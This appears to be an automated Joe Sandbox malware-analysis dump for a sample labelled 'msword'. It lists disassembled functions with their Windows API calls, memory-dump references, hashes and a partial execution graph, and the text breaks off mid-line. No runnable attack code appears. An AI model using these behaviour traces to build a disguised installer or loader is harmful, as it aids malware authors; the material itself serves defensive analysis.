                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                    • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                    • String ID:
                                                                    • API String ID: 1599320355-0
                                                                    • Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                    • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                    • Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                    • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                    Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                    • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                    • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcpyn$CreateFilelstrcmp
                                                                    • String ID: Version
                                                                    • API String ID: 512980652-315105994
                                                                    • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                    • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                    • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                    • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                    Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                    • GetTickCount.KERNEL32 ref: 00403303
                                                                    • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                    • String ID:
                                                                    • API String ID: 2102729457-0
                                                                    • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                    • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                    • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                    • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                    Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                    • String ID:
                                                                    • API String ID: 2883127279-0
                                                                    • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                    • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                    • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                    • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                    Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringlstrcmp
                                                                    • String ID: !N~
                                                                    • API String ID: 623250636-529124213
                                                                    • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                    • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                    • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                    • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                    Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                    • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                    Strings
                                                                    • Error launching installer, xrefs: 00405C48
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleProcess
                                                                    • String ID: Error launching installer
                                                                    • API String ID: 3712363035-66219284
                                                                    • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                    • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                    • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                    • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                    Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                      • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandlelstrlenwvsprintf
                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                    • API String ID: 3509786178-2769509956
                                                                    • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                    • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                    • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                    • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                    Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                    • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                    • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 190613189-0
                                                                    • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                    • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                    • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                    • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                    Execution Graph

                                                                    Execution Coverage:2.9%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:3.4%
                                                                    Total number of Nodes:2000
                                                                    Total number of Limit Nodes:70
                                                                    execution_graph 102133 c9076b 102134 c90777 CallCatchBlock 102133->102134 102163 c90221 102134->102163 102136 c9077e 102137 c908d1 102136->102137 102140 c907a8 102136->102140 102204 c90baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 102137->102204 102139 c908d8 102197 c951c2 102139->102197 102147 c907e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 102140->102147 102174 ca27ed 102140->102174 102150 c90848 102147->102150 102200 c9518a 38 API calls 2 library calls 102147->102200 102148 c907c7 102182 c90cc9 102150->102182 102152 c9084e 102186 c7331b 102152->102186 102157 c9086a 102157->102139 102158 c9086e 102157->102158 102159 c90877 102158->102159 102202 c95165 28 API calls _abort 102158->102202 102203 c903b0 13 API calls 2 library calls 102159->102203 102162 c9087f 102162->102148 102164 c9022a 102163->102164 102206 c90a08 IsProcessorFeaturePresent 102164->102206 102166 c90236 102207 c93004 10 API calls 3 library calls 102166->102207 102168 c9023b 102173 c9023f 102168->102173 102208 ca2687 102168->102208 102171 c90256 102171->102136 102173->102136 102175 ca2804 102174->102175 102176 c90dfc _ValidateLocalCookies 5 API calls 102175->102176 102177 c907c1 102176->102177 102177->102148 102178 ca2791 102177->102178 102181 ca27c0 102178->102181 102179 c90dfc _ValidateLocalCookies 5 API calls 102180 ca27e9 102179->102180 102180->102147 102181->102179 102288 c926b0 102182->102288 102185 c90cef 102185->102152 102187 c73327 IsThemeActive 102186->102187 102188 c73382 102186->102188 102290 c952b3 102187->102290 102201 c90d02 GetModuleHandleW 102188->102201 102190 c73352 102296 c95319 102190->102296 102192 c73359 102303 c732e6 SystemParametersInfoW SystemParametersInfoW 102192->102303 102194 c73360 102304 c7338b 102194->102304 102196 c73368 SystemParametersInfoW 102196->102188 103412 c94f3f 102197->103412 102200->102150 102201->102157 102202->102159 102203->102162 102204->102139 102206->102166 102207->102168 102212 cad576 102208->102212 102211 c9302d 8 API calls 3 library calls 102211->102173 102215 cad58f 102212->102215 102216 cad593 102212->102216 102214 c90248 102214->102171 102214->102211 102236 c90dfc 102215->102236 102216->102215 102219 ca4eb8 102216->102219 102224 ca4f6e 102216->102224 102223 ca4ebf 102219->102223 102220 ca4f02 GetStdHandle 102220->102223 102221 ca4f6a 102221->102216 102222 ca4f15 GetFileType 102222->102223 102223->102220 102223->102221 102223->102222 102225 ca4f7a CallCatchBlock 102224->102225 102243 ca32d1 EnterCriticalSection 102225->102243 102227 ca4f81 102244 ca5422 102227->102244 102229 ca4f90 102235 ca4f9f 102229->102235 102257 ca4e02 29 API calls 102229->102257 102232 ca4f9a 102233 ca4eb8 2 API calls 102232->102233 102233->102235 102234 ca4fb0 __fread_nolock 102234->102216 102258 ca4fbb LeaveCriticalSection _abort 102235->102258 102237 c90e05 102236->102237 102238 c90e07 IsProcessorFeaturePresent 102236->102238 102237->102214 102240 c90fce 102238->102240 102287 c90f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 102240->102287 102242 c910b1 102242->102214 102243->102227 102245 ca542e CallCatchBlock 102244->102245 102246 ca543b 102245->102246 102247 ca5452 102245->102247 102267 c9f649 20 API calls _abort 102246->102267 102259 ca32d1 EnterCriticalSection 102247->102259 102250 ca5440 102268 ca2b5c 26 API calls _abort 102250->102268 102252 ca548a 102269 ca54b1 LeaveCriticalSection _abort 102252->102269 102253 ca544a __fread_nolock 102253->102229 102254 ca545e 102254->102252 102260 ca5373 102254->102260 102257->102232 102258->102234 102259->102254 102270 ca4ff0 102260->102270 102262 ca5385 102266 ca5392 102262->102266 102277 ca3778 11 API calls 2 library calls 102262->102277 102265 ca53e4 102265->102254 102278 ca2d38 102266->102278 102267->102250 102268->102253 102269->102253 102275 ca4ffd _abort 102270->102275 102271 ca503d 102285 c9f649 20 API calls _abort 102271->102285 102272 ca5028 RtlAllocateHeap 102273 ca503b 102272->102273 102272->102275 102273->102262 102275->102271 102275->102272 102284 c9521d 7 API calls 2 library calls 102275->102284 102277->102262 102279 ca2d43 RtlFreeHeap 102278->102279 102280 ca2d6c __dosmaperr 102278->102280 102279->102280 102281 ca2d58 102279->102281 102280->102265 102286 c9f649 20 API calls _abort 102281->102286 102283 ca2d5e GetLastError 102283->102280 102284->102275 102285->102273 102286->102283 102287->102242 102289 c90cdc GetStartupInfoW 102288->102289 102289->102185 102291 c952bf CallCatchBlock 102290->102291 102353 ca32d1 EnterCriticalSection 102291->102353 102293 c952ca pre_c_initialization 102354 c9530a 102293->102354 102295 c952ff __fread_nolock 102295->102190 102297 c9533f 102296->102297 102298 c95325 102296->102298 102297->102192 102298->102297 102358 c9f649 20 API calls _abort 102298->102358 102300 c9532f 102359 ca2b5c 26 API calls _abort 102300->102359 102302 c9533a 102302->102192 102303->102194 102305 c7339b __wsopen_s 102304->102305 102360 c7bf73 102305->102360 102309 c733ce IsDebuggerPresent 102310 cb3ca3 MessageBoxA 102309->102310 102311 c733dc 102309->102311 102312 cb3cbb 102310->102312 102311->102312 102313 c733f0 102311->102313 102495 c74176 22 API calls 102312->102495 102433 c73a95 102313->102433 102320 c73462 102322 cb3cec SetCurrentDirectoryW 102320->102322 102323 c7346a 102320->102323 102322->102323 102324 c73475 102323->102324 102496 cd1fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 102323->102496 102477 c734d3 7 API calls 102324->102477 102327 cb3d07 102327->102324 102331 cb3d19 102327->102331 102330 c7347f 102338 c73494 102330->102338 102481 c7396b 102330->102481 102497 c75594 102331->102497 102334 cb3d22 102504 c7b329 102334->102504 102336 cb3d30 102339 cb3d38 102336->102339 102340 cb3d5f 102336->102340 102337 c734af 102344 c734b6 SetCurrentDirectoryW 102337->102344 102338->102337 102491 c73907 102338->102491 102510 c76b7c 102339->102510 102343 c76b7c 22 API calls 102340->102343 102346 cb3d5b GetForegroundWindow ShellExecuteW 102343->102346 102347 c734ca 102344->102347 102351 cb3d90 102346->102351 102347->102196 102350 cb3d51 102352 c76b7c 22 API calls 102350->102352 102351->102337 102352->102346 102353->102293 102357 ca3319 LeaveCriticalSection 102354->102357 102356 c95311 102356->102295 102357->102356 102358->102300 102359->102302 102520 c9017b 102360->102520 102362 c7bf88 102530 c9014b 102362->102530 102364 c733a7 GetCurrentDirectoryW 102365 c74fd9 102364->102365 102366 c7bf73 22 API calls 102365->102366 102367 c74fef 102366->102367 102555 c763d7 102367->102555 102369 c7500d 102569 c7bd57 102369->102569 102373 c7502c 102579 c7893c 102373->102579 102376 c7b329 22 API calls 102377 c75045 102376->102377 102582 c7be2d 102377->102582 102379 c75055 102380 c7b329 22 API calls 102379->102380 102381 c7507b 102380->102381 102382 c7be2d 40 API calls 102381->102382 102383 c7508a 102382->102383 102384 c7bf73 22 API calls 102383->102384 102385 c750a8 102384->102385 102586 c751ca 102385->102586 102389 c750c2 102390 cb4b23 102389->102390 102391 c750cc 102389->102391 102393 c751ca 22 API calls 102390->102393 102392 c94d98 40 API calls 102391->102392 102394 c750d7 102392->102394 102395 cb4b37 102393->102395 102394->102395 102396 c750e1 102394->102396 102398 c751ca 22 API calls 102395->102398 102397 c94d98 40 API calls 102396->102397 102399 c750ec 102397->102399 102400 cb4b53 102398->102400 102399->102400 102401 c750f6 102399->102401 102402 c75594 24 API calls 102400->102402 102403 c94d98 40 API calls 102401->102403 102404 cb4b76 102402->102404 102405 c75101 102403->102405 102406 c751ca 22 API calls 102404->102406 102407 cb4b9f 102405->102407 102408 c7510b 102405->102408 102409 cb4b82 102406->102409 102411 c751ca 22 API calls 102407->102411 102410 c7512e 102408->102410 102413 c7bed9 22 API calls 102408->102413 102412 c7bed9 22 API calls 102409->102412 102415 cb4bda 102410->102415 102602 c77e12 102410->102602 102414 cb4bbd 102411->102414 102417 cb4b90 102412->102417 102418 c75121 102413->102418 102419 c7bed9 22 API calls 102414->102419 102421 c751ca 22 API calls 102417->102421 102422 c751ca 22 API calls 102418->102422 102423 cb4bcb 102419->102423 102421->102407 102422->102410 102425 c751ca 22 API calls 102423->102425 102425->102415 102428 c7893c 22 API calls 102430 c75167 102428->102430 102429 c78a60 22 API calls 102429->102430 102430->102428 102430->102429 102431 c751ab 102430->102431 102432 c751ca 22 API 